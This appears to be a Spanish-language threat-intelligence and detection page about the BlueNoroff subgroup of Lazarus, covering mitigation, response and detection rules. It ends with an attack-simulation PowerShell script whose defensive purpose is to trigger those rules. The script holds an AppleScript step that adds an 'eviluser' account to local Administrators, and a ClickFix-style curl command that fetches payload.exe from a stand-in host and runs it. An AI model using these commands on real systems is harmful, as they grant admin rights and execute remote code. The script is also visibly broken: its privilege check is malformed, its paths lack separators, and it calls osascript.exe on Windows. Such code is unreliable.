Grupo BlueNoroff: El Brazo del Cibercrimen Financiero de Lazarus
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
BlueNoroff es un subgrupo financieramente motivado dentro del ecosistema de Lazarus que se centra en operaciones de robo de alto valor contra bancos, empresas de criptomonedas y objetivos más amplios de Web3. El manual del grupo abarca fraudes habilitados por SWIFT, compromisos de watering hole, envenenamiento de la cadena de suministro de paquetes Go y caminos de intrusión en macOS construidos alrededor de cebos de «entrevistas de trabajo» falsos. Para lograr ejecución y persistencia, BlueNoroff mezcla una pila de malware modular en Rust/Go con AppleScript, VBScript y flujos de trabajo de ingeniería social diseñados para eludir la precaución del usuario e integrarse en actividades legítimas de desarrollo y administración.
Investigación
El informe rastrea la trayectoria de BlueNoroff desde el atraco al Banco de Bangladesh en 2016 hasta las más recientes actividades de la era 2025 en la cadena de suministro, destacando cómo las herramientas y objetivos del actor se han expandido junto con el ecosistema cripto/Web3. Los investigadores describen patrones de infraestructura y catalogan componentes de malware que incluyen GhostCall, GhostHire, RustBucket y GillyInjector. La investigación también mapea comportamientos observados en MITRE ATT&CK a través de etapas como reconocimiento y acceso inicial, luego ejecución, persistencia y robo de credenciales, subrayando un énfasis constante en establecer puntos de apoyo sigilosos, la entrega escalonada de cargas útiles y rutas de acceso preparadas para el robo.
Mitigación
Reduzca la exposición al mejorar la higiene de la cadena de suministro: valide los paquetes extraídos de registros públicos, refuerce el control de encapsulamiento y procedencia, y revise continuamente las actualizaciones de dependencias para cambios inesperados en el mantenedor o el código. En macOS, fortalezca la gestión de LaunchAgent/LaunchDaemon y monitorice entradas de persistencia sospechosas y herramientas no firmadas. Bloquee dominios que se asemejan a los utilizados para el envío de cebos, refuerce la MFA para identidades privilegiadas y servicios expuestos externamente, y operacionalice detecciones para scripts maliciosos conocidos, cargadores y técnicas de empaquetado asociadas con el actor. Mantenga actualizaciones frecuentes de inteligencia de amenazas y refuerce la capacitación de los usuarios enfocada en spear-phishing y patrones de ingeniería social de «reclutador/entrevista de trabajo».
Respuesta
Si se descubren indicadores de BlueNoroff, aísle los hosts afectados y conserve las pruebas clave, incluidas líneas de comando completas, contenido de scripts y binarios o artefactos de paquetes descargados. Bloquee los dominios maliciosos identificados y las IPs de C2, luego ejecute los playbooks de respuesta a incidentes alineados con el robo de credenciales y escenarios de compromiso de la cadena de suministro. Despliegue o ajuste detecciones para cadenas de ejecución AppleScript y VBScript, y para patrones sospechosos de PowerShell mencionados en el informe, luego amplíe la búsqueda para identificar endpoints adicionales expuestos al mismo señuelo, dependencia o superposición de infraestructura.
Flujo de Ataque
Detecciones
Posible Descubrimiento de Configuración de Red del Sistema (mediante cmdline)
Ver
Posible Descubrimiento de Sistema Remoto o Verificación de Conectividad (mediante cmdline)
Ver
Binario/Scripts Sospechosos en Ubicación de Autoinicio (mediante file_event)
Ver
Posible Enumeración de Cuentas de Administrador o Grupo (mediante cmdline)
Ver
IOCs (Emails) para detectar: BlueNoroff Group: El Brazo Financiero del Cibercrimen de Lazarus
Ver
Detección de AppleScript Malicioso y Ejecución de Comando ClickFix [Windows Process Creation]
Ver
Enumeración de Usuarios Locales y de Dominio a través de Comandos de Net [Windows Sysmon]
Ver
Detección de Ofuscación y Codificación de BlueNoroff PowerShell [Windows PowerShell]
Ver
Ejecución de Simulación
Requisito Previo: La Verificación de Telemetría y Línea Base de Pre-Vuelo debe haber sido aprobada.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y pretender generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.
-
Narrativa de Ataque y Comandos:
- Ejecución de AppleScript (T1546.016) – El adversario deja caer un
payload.scptmalicioso en el endpoint (por ejemplo, a través de un adjunto de phishing). Usando unosascript.exepreinstalado (incluido con una herramienta de terceros), lanzan el script para ejecutar una carga útil de PowerShell que agrega una nueva cuenta de administrador local. - Entrega de Clipboard ClickFix (T1204.004) – El atacante copia un comando preparado al portapapeles que invoca
curlcon un usuario-agente estilo Zoom para descargar una carga útil de segunda etapa, luego inmediatamente la ejecuta a través decmd.exe. El comando también incluye una llamada en línea apowershell.exe -cpara ejecutar la carga útil en memoria.
- Ejecución de AppleScript (T1546.016) – El adversario deja caer un
-
Script de Prueba de Regresión: El script a continuación reproduce ambos comportamientos de una manera determinista.
#----- BEGIN REGRESSION TEST SCRIPT ----- # Asegúrese de que estamos corriendo con privilegios administrativos if (-not ([Security.Principal.WindowsPrincipal] ` [Security.Principal.WindowsBuiltInRole] "Administrator")) { Write-Error "Run this script as Administrator." exit 1 } # 1. Ejecución de AppleScript vía osascript.exe $appleScriptPath = "$env:TEMPmalicious.scpt" Set-Content -Path $appleScriptPath -Value @" tell application "System Events" do shell script "powershell -c `"Add-LocalGroupMember -Group 'Administrators' -Member 'eviluser'`"" end tell "@ # Ejecute el AppleScript Start-Process -FilePath "osascript.exe" -ArgumentList "`"$appleScriptPath`"" -NoNewWindow -Wait # 2. Entrega estilo ClickFix del portapapeles $clickFixCmd = 'curl -A "ZoomSDK" http://malicious.example.com/payload.exe -o $env:TEMPpayload.exe && powershell.exe -c "Start-Process $env:TEMPpayload.exe"' # Ejecute vía cmd.exe para coincidir con la condición de regla Start-Process -FilePath "cmd.exe" -ArgumentList "/c `$clickFixCmd" -NoNewWindow -Wait # Limpieza: eliminar artefactos Remove-Item -Path $appleScriptPath -Force Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # Fin del script #----- END REGRESSION TEST SCRIPT ----- -
Comandos de Limpieza: Elimine cualquier proceso, archivo y cuenta de usuario de prueba restantes.
# Detener cualquier proceso restante (defensivo - normalmente no es necesario) Get-Process -Name "osascript","cmd","powershell","payload" -ErrorAction SilentlyContinue | Stop-Process -Force # Eliminar archivos temporales Remove-Item -Path "$env:TEMPmalicious.scpt" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # Eliminar la cuenta administradora de prueba si fue creada if (Get-LocalUser -Name "eviluser" -ErrorAction SilentlyContinue) { Remove-LocalUser -Name "eviluser" }